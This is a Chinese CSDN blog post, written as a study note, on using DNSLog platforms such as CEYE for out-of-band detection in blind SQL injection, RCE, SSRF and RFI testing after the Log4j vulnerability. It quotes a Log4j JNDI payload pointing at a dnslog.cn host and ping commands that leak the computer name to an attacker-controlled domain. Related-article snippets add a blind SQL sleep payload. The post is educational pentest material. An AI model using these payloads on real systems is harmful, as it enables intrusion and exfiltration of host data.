[NOTE] 关于DNSLog平台的使用

最新推荐文章于 2024-04-17 21:49:28 发布
最新推荐文章于 2024-04-17 21:49:28 发布
阅读量4.3k 收藏 1
点赞数
分类专栏: 工具框架 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43266093/article/details/121864286
版权

[NOTE] 关于DNSLog平台的使用

前言

起因是12.09午夜的Log4j核弹级漏洞
大家验证漏洞的payload:${jndi:idap://XXXX.dnslog.cn/aa}
发现大家用的都是DNSLog,而自己还不太懂这个
于是发现自己还是真的菜

就赶紧补一波

所以说什么时候自己租个服务器

DNSLog Platform

现如今的DNS解析一般是一个递归+迭代解析的过程:

在这里插入图片描述

粉->蓝->黄->绿->红

其中我们可以自己建立一个红色的服务器,接收记录每次的DNS请求

可以在一些在线的DNSLog平台申请一个域名,作为临时的DNS服务器
受害者查询的这个域名解析请求,会被该DNS服务器记录下
攻击者就可以结合其他字段形成payload,来进行渗透测试

主要针对无回显、盲注的情况

  • SQL盲注

  • RCE

  • SSRF

  • RFI (Remote File Inclusion)

相当于是提供一个回显的地方

实例

CEYE为例

在CEYE已经申请到了一个子域名:XXXXX.ceye.io
这个就相当于是一个攻击者的DNS服务器了
然后任何关于*.XXXXX.ceye.io\*的解析请求都会被记录

于是简单一下,尝试:ping whoami.XXXXX.ceye.io
在这里插入图片描述

结合其他字段形成payload:ping %computername%.XXXXX.ceye.io
在这里插入图片描述

大概就这样吧
CEYE除了DNS服务器之外,还有HTTP服务器

最后记下Windows和Linux的一些常用系统变量
另起笔记,在这里

Archeri_Shade
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DNSlog平台详解
不忘初心,护天下安全!
09-21 4098
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出, 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入,如命令执行、SSRF、XXE、sql盲注、xxs盲打等。在windows和linux因具体shell指令不同,因此需要分情况讨论,但思路一致,通过在dnslog平台的查询中,插入主机指令执行后的结果,将结果数据外带。以靶场 pikachu 的时间盲注为例,输入qianli' and sleep(5)#,耗时5秒。
NoteExpress使用指南
01-24
包含NoteExpress功能图解和NE快速即学即用详细指导,包学包会哈!亲测有用!!
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang 相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键构造自己的Dnslog平台。由于是作者的第一个golang程序,难免会有一些小问题。不过他真的是一键! 部署 克隆或者下载本仓库到你的服务器上 不多说。 决定是否开放公网访问? 倒数第几行中的http.ListenAndServe("localhost:8000", nil) ,这样写的话只能通过本地主机进行访问,墙裂建议不要修改,而后通过中间件反向代理后对外开放,方便做访问控制,日志管理等。如果想直接对外开放的话可以修改为: http.ListenAndServe(":8000", nil) 域名准备 做好NS指向即可。不会检查请看后文 尝试运行 ~~
DNSLog漏洞
最新发布
shirlly_的博客
04-17 401
DNS(Domain Name System)是一个用于将域名转换为与之对应的 IP 地址的分布式命名系统。DNS日志是记录特定设备或网络发出的所有DNS查询的记录。这些日志可用于排除DNS问题、监控网络活动和分析流量模式。DNS日志通常包括信息,如源IP地址、查询的域名、查询类型(如A记录、MX记录)以及从DNS服务器接收到的响应。没有回显的情况下怎么办?利用限制利用DNSLog服务中的漏洞进行数据窃取攻击。攻击者可以通过在受害者系统上植入恶意代码,使其发送DNS请求到恶意控制的DNSLog服务器。
note express使用方法
01-13
note express是对中文比较友好的文献管理软件,有很多大学图书馆或者某省的图书馆版本可以下载,有集团版和个人版之分。
NOteExpress使用指南
12-07
NOteExpress使用指南
note笔记的使用
02-27
java的基础练习,一些基础的语句和数据的交互使用,对于代码记忆有帮助;
好用的dnslog在线平台
热门推荐
siu~
08-21 1万+
dnslog在线平台分享
个人DNSLog平台搭建
ShangYaoPaiGu的博客
12-07 2058
搭建一个DNSLog平台需要准备以下:我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名 www.baidu.com 等的访问信息,类似日志文件。在服务器中输入 解压 进入目录后使用保证DNSLog平台可以在后台运行 创建新的,使用该命令后会自动进入该screen: 修改配置文件
DNSlog平台的搭建
m0_51468027的博客
07-12 5609
从0到1搭建DNSlog平台,最后拓展了实现自动化运行DNSlog平台
DNSLog漏洞探测(二)之常用DNSLog平台
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 2870
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台DNSLog平台非常的多,但是实际上大部分的DNSLog平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
NoteExpress使用教程
11-27
NoteExpress 使用教程 NoteExpress 文件管理软件 功能图解
dnslog:简约的 DNS 日志记录工具
05-31
dns日志 信息 简约的 DNS 日志记录工具。 捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192.168.110.233 ocsp.verisign.com 23.37.43.27 00:00:00.001949 Q PTR 192.168.107.146 199.253.182.182 2.6.e.f.a.b.e.f.f.f.6.5.0.5.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa ? 00:00:00.002314 R AAAA 37.48.122.173 194.5
【老火柴擦出新火花】利用DNSlog进行更高效率的无回显渗透测试
jklbnm12的博客
07-17 2076
目录0.说在前面0.1.DNSlog工具1.什么是DNSlog2.DNSlog回显原理3.DNSlog通常用在哪些地方3.1.SQL注入盲注3.2.XSS盲打3.3.无回显的命令执行3.4.无回显的SSRF3.5.无回显的XXE(Blind XXE) 0.说在前面 0.1.DNSlog工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog 另外我们也可以使用在线平台: http://
让你也体验一把当黑客的感觉:复现了log4j2的漏洞
qq_39521139的博客
12-11 1679
大家好,我叫大圣。 这几天Apache Log4j2 远程代码执行漏洞一出,让广大的程序员和运维人员夜不能寐,由于我们公司的Flink业务代码也用到了Log4j2日志,我也抓紧去了解了一下,然后采取了相应的补救措施。但是一直想对这个Log4j2 远程执行漏洞进行复现一下,是不是真的像网上说的那样严重,然后经过学习复现了这个log4j的bug。 本篇文章主要讲怎么复现这个log4j的远程执行bug,关于怎么基于这个log4j的漏洞去采取补救措施,网上说了很多了,这里就不再说了,下面我们直接步入正题。 首先咱们
DNSlog使用
weixin_48000706的博客
07-31 1155
【代码】DNSlog使用
DNSlog
情感博主V
02-27 2825
相关介绍 DNS        域名系统(Domain Name System),是互联网使用的命名系统,用来便于人们使用的机器名字转换为IP地址。 DNS解析 解析过程要点:        当某一个应用进程需要把主机名解析为IP地址时,该应用进程就调用解析程...
dnslog.cn的使用
weixin_43622525的博客
12-04 8546
网站首页 1点击 Get SubDomain 2复制1x7ojc.dnslog.cn 3打开cmd命令行 4输入nslookup1x7ojc.dnslog.cn 5回到dnslog.cn点击Refresh Record 总结: 用来判断是否可以连接外网
NoteExpress生产参考文献如何使用
06-12
NoteExpress是一款常用的参考文献管理软件,可以帮助用户方便地管理、组织、搜索和导出参考文献。以下是NoteExpress生产参考文献的基本使用方法: 1. 创建文献库:在NoteExpress中创建一个文献库,可以根据需要命名和分类。 2. 添加参考文献:将已经获取的论文、图书、报告等文献导入到NoteExpress中。可以手动添加或者通过检索在线数据库自动导入。 3. 管理文献:对导入的参考文献进行分类、标记、编辑等操作,方便后续查找和使用。 4. 生成参考文献:在写作论文或者其他学术文献时,可以使用NoteExpress的插件在Word或者其他编辑软件中生成参考文献。可以根据不同的参考文献格式(如APA、MLA、Chicago等)进行格式化输出。 总之,NoteExpress可以帮助用户轻松管理和生成参考文献,提高学术写作的效率和质量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值